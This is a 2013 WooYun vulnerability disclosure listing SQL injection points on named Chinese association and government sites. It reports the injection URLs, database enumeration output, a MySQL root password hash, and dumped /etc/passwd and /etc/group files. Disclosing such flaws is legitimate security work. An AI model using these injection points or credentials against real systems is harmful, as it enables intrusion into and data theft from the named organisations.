当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024648

漏洞标题:各省市各行业协会与某政府安全漏洞打包

相关厂商:各省市各行业协会and某政府

漏洞作者: 雅柏菲卡

提交时间:2013-05-28 12:52

修复时间:2013-07-12 12:52

公开时间:2013-07-12 12:52

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-28: 细节已通知厂商并且等待厂商处理中
2013-06-01: 厂商已经确认,细节仅向厂商公开
2013-06-11: 细节向核心白帽子及相关领域专家公开
2013-06-21: 细节向普通白帽子公开
2013-07-01: 细节向实习白帽子公开
2013-07-12: 细节向公众公开

简要描述:

....

详细说明:

....

漏洞证明:

【上海市快递业协会】
注入点 http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14
Target: http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14
Host IP: 222.73.218.56
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
DB Server: MySQL >=5
Resp. Time(avg): 671 ms
Current User: kdxhdata@localhost
Sql Version: 5.1.63-community
Current DB: kdxhdata
System User: kdxhdata@localhost
Host Name: ewww6-c5d621bc4
Installation dir: D:\Data\MySQL\MySQL Server 5.1
DB User: 'kdxhdata'@'localhost'
Data Bases: information_schema
kdxhdata

1.jpg


后台可进 我就不截图了 测试账号居然不删的 囧死了


【中山市物流协会】
注入点 http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214
Target: http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214
Host IP: 119.145.255.140
Web Server: nginx/1.2.0
DB Server: MySQL >=4.1
Resp. Time(avg): 97 ms
Current User: root@127.0.0.1
Sql Version: 4.1.20-standard-log
Current DB: logistics
System User: root@127.0.0.1
DB User & Pass: root:*1C66292FFB5D037ECC7825FFCF57B2C2F99D7F1A:localhost
root:*1C66292FFB5D037ECC7825FFCF57B2C2F99D7F1A:119.145.255.140
root:*1C66292FFB5D037ECC7825FFCF57B2C2F99D7F1A:127.0.0.1

2.jpg


[/etc/passwd]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rtkit:x:499:499:RealtimeKit:/proc:/sbin/nologin
abrt:x:498:498::/etc/abrt:/sbin/nologin
saslauth:x:497:495:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
pulse:x:496:494:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
forgov:x:500:500:forgov:/home/forgov:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:495:489:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
clamav:x:494:488:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
amavis:x:493:487::/var/spool/amavisd:/sbin/nologin
vmail:x:501:501::/var/vmail:/sbin/nologin
policyd:x:502:502::/home/policyd:/sbin/nologin
iredadmin:x:503:503::/home/iredadmin:/sbin/nologin
iredapd:x:504:504:iRedAPD daemon user:/home/iredapd:/sbin/nologin
nagios:x:505:505::/home/nagios:/bin/bash
zabbix:x:506:506::/home/zabbix:/bin/bash
[/etc/group]
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root
lp:x:7:daemon,lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
mail:x:12:mail,postfix
uucp:x:14:uucp
man:x:15:
games:x:20:
gopher:x:30:
video:x:39:
dip:x:40:
ftp:x:50:
lock:x:54:
audio:x:63:
nobody:x:99:
users:x:100:
dbus:x:81:
utmp:x:22:
utempter:x:35:
floppy:x:19:
vcsa:x:69:
avahi-autoipd:x:170:
rpc:x:32:
rtkit:x:499:
abrt:x:498:
desktop_admin_r:x:497:
desktop_user_r:x:496:
cdrom:x:11:
tape:x:33:
dialout:x:18:
saslauth:x:495:
postdrop:x:90:
postfix:x:89:
rpcuser:x:29:
nfsnobody:x:65534:
haldaemon:x:68:haldaemon
kvm:x:36:qemu
qemu:x:107:
avahi:x:70:
ntp:x:38:
sshd:x:74:
mysql:x:27:
tcpdump:x:72:
slocate:x:21:
oprofile:x:16:
pulse:x:494:
pulse-access:x:493:
stapdev:x:492:
stapusr:x:491:
fuse:x:490:
stap-server:x:155:
gdm:x:42:
forgov:x:500:
dovecot:x:97:
dovenull:x:489:
apache:x:48:
clamav:x:488:
amavis:x:487:clamav
vmail:x:501:
policyd:x:502:
iredadmin:x:503:
iredapd:x:504:
nagios:x:505:
zabbix:x:506:
vbirdgroup:x:507:


【广东省企业信用信息网】
注入点:http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:
Target: http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:
Host IP: 210.76.66.106
Web Server: Apache/2.0.49 (Unix)
DB Server: Oracle
Resp. Time(avg): 2590 ms
Current User: CREDIT
Is User DBA: FALSE
Sql Version: Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Prod
Current DB: CRDT
Host Name: localhost
DB User: SCOTT
MGMT_VIEW
WKPROXY
WKSYS
MDDATA
SYSMAN
ANONYMOUS
XDB
WK_TEST
OLAPSYS
CTXSYS
MDSYS
SI_INFORMTN_SCHEMA
ORDPLUGINS
ORDSYS
EXFSYS
WMSYS
DBSNMP
DMSYS
DIP
OUTLN
SYSTEM
SYS
CREDIT
Data Bases: SYS
SYS
SYS
SYS

3.jpg

虽然不知道是什么用的数据表 但是我觉得挺厉害的


湖北省物流公共信息服务平台
登陆框注入

4.jpg


5.jpg


http://www.56ok.net/backstage/Login.aspx 后台


【东莞市物流行业协会官方网】
注入点 http://www.0769wl.com/info/info_browse.php?infoID=6548
Target: http://www.0769wl.com/info/info_browse.php?infoID=6548
Host IP: 222.186.191.104
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Resp. Time(avg): 210 ms
Current User: sql0769wl@suer-ab6d8c667e
Sql Version: 5.0.51b-community-nt
Current DB: sql0769wl
System User: sql0769wl@suer-ab6d8c667e
Host Name: suer-ab6d8c667e
Installation dir: E:\PHPnow\MySQL-5.0.15b
DB User: 'sql0769wl'@'%'
Data Bases: information_schema
sql0769wl

6.jpg


不知道哪个是 后台表 搁在这儿


【南通市银行业协会】
注入点 http://www.bankingassociationnt.com/news/Transfer.asp?newsid=8084

7.jpg


用户名可读出 具体的应急中心测试吧


【海南省注册会计协会】
注入点:http://www.hicpa.org.cn/acctt_web/papers/zhxx.asp?cs=101

8.jpg


9.jpg

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-06-01 22:13

厂商回复:

最新状态:

暂无